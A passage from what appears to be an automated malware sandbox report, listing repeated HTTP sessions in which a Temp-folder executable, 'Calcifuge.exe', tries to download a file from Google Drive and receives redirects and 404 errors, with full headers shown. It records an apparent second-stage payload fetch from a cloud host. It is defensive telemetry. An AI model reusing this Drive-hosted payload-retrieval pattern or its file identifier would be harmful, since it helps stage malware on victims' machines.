                                                                                              Content-Security-Policy: script-src 'nonce-G-ABYfKO1GDwE9XbVtyA-w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              61 | 192.168.2.4 | 53782 | 172.217.16.129 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:53:40 UTC | 470 | OUT | GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:40 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgSWL9vuJ7KdwhvrJ9VugPA6MlE8_1W0SNe_skQ_pfqJQ8ZZIUd10sKRtOTiVRRnBzhBLcTi7Do
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:40 GMT
                                                                                              Content-Security-Policy: script-src 'nonce-hgAgtASwTeNjyWlD3ZnS_w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:53:40 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="yDkIwSm9gQPFZ9K0ztG70g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              62 | 192.168.2.4 | 53783 | 172.217.16.206 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:53:41 UTC | 428 | OUT | GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:41 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:41 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-P4t3a8xaFzGQLJilrBJF2Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              63 | 192.168.2.4 | 53784 | 172.217.16.129 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:53:42 UTC | 470 | OUT | GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:42 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgTEkSdB5hS4vuXRSGDRJp6RYrJleGbFrd5lK99c7WGfKZTbdFgO68-6_CfJB2kJDCJt-ArzxFA
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:42 GMT
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-pwvqD6LTrtBEmzgHA5vyHA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:53:42 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="_8CQ5077cXejK0lWpnV4mg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              64 | 192.168.2.4 | 53785 | 172.217.16.206 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:53:43 UTC | 428 | OUT | GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:43 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:43 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-CTyQMYcsbth0wXrpHrv8xg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              65 | 192.168.2.4 | 53786 | 172.217.16.129 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:53:44 UTC | 470 | OUT | GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:44 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC52WCurO64HWgCmKwyuTh-Z-o9GNpP7qlMDc0l9XI52ty04waw7yMExhVGTuCwClHAV
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:44 GMT
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-nSZ_3Pr0GrSS6exQnu7_RQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:53:44 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8CUUciO30Aazn7pb9JRAsg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              66 | 192.168.2.4 | 53787 | 172.217.16.206 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:53:45 UTC | 428 | OUT | GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:46 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:46 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: script-src 'nonce-N5oSTWk7a7rPGbyqjNm8jA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              67 | 192.168.2.4 | 53788 | 172.217.16.129 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:53:46 UTC | 470 | OUT | GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:47 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgTw8pVFJ_8gROVWcfMpRK9XMxYI1LnJgW4ao20t_wr7dGvE1bfAqkOQZvJa6BXOYrja
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:47 GMT
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'nonce-uSayR9OTTZLc2K0fZyucTw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="71IRDnZRPoidGZo11ZHv5w">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              68 | 192.168.2.4 | 53789 | 172.217.16.206 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:53:48 UTC | 428 | OUT | GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:48 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:48 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'nonce-vRWc6zWOdBQT-mVXrLiKRw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
